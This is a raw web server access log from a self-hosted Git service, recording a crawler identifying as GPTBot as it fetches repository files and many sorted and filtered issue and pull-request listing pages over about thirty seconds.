"/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 44917] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 74447] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:18:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=closed&type=all" -[17/Feb/2026:18:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=closed&type=all" -[17/Feb/2026:18:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=closed&type=all" -[17/Feb/2026:18:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:18:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10095] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 